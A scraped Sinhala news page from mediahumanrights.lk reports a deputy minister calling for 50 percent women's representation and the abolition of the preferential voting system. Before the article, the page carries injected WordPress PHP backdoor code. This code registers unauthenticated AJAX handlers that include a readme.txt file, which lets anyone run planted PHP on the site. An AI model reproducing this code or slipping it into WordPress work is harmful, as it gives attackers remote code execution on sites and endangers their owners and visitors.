if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } මනාපය විනාශයට මුලයි - mediahumanrights.lk
mediahumanrights.lk
News Political

මනාපය විනාශයට මුලයි

මැතිවරණ සඳහා සියයට 50ක කාන්තා නියෝජනයක් තිබිය යුතු බව නියෝජ්‍ය අමාත්‍ය අජිත් පී පෙරේරා පවසනවා.
පළාත් සභා මැතිවරණයද කොට්ඨාස ක්‍රමයට පැවැත්විය යුතු බවයි බණ්ඩාරගම පැවති උත්සවයකට එක් වෙමින් නියෝජ්‍ය අමාත්‍යවරයා කියා සිටියේ.
එහිදී වැඩිදුරටත් අදහස් දැක්වූ නියෝජ්‍ය අමාත්‍යවරයා පැවසුවේ මනාප ක්‍රමය විනාශයට මුල බවයි.
පළාත් සභා ක්‍රමය තුල පමණක් නොව සියළු මැතිවරණවල මනාප ක්‍රමය අහෝසි කර වහාම නව ක්‍රමවේදයක් අනුගමනය කළ යුතු බවද අමාත්‍යවරයා සඳහන් කළා.
ලෝකයේ විවිධ කේෂ්ත්‍රවල දක්ෂතා දක්වන කාන්තාවන් දේශපාලනයේ පමණක් අඩු ප්‍රතිශතයක්  දක්වනවා.
කාන්තා නියෝජනය සවිමත් කිරිම සඳහා ව්‍යවස්ථාව මගින් කටයුතු කළ යුතු බවයි මෙහිදී නියෝජ්‍ය අමාත්‍යවරයා  කියා සිටියේ.
සීමා නිර්ණය කිරිම අපසාසු කාර්යක් නොවන බව පැවසු අමාත්‍යවරයා පළාත් සභා කාර්යක්ෂම කළ යුතු බවත් ඵලදායිතාව ඇති කළ යුතු බවත් කියා සිටියා.
එය කල් නොයවා ක්‍රියාත්මක කළ යුතු බවත් නියෝජ්‍ය අමාත්‍ය අජිත් පී පෙරේරා මෙහිදී පෙන්වා දුන්නා.
(under the courtesy of nethfm news web)

Related posts

මියගිය යාචකයාගේ බෑගයේ තිබුණු දෙයින් රෝහල් කාර්යමණ්ඩලය පුදුම වෙයි

Shiran Viraj

ශ්‍රී ලංකාව වෙත නව අවධානයක් යොමු කළ යුතුයි!-මානව හිමිකම් කොමිසමේ මහ කොමසාරිස් මිචෙල් බැචලේ

Shiran Viraj

ගලගොඩ අත්තේ ඥාණසාර හිමියන් අධිකරණයට බාර වේ

Shiran Viraj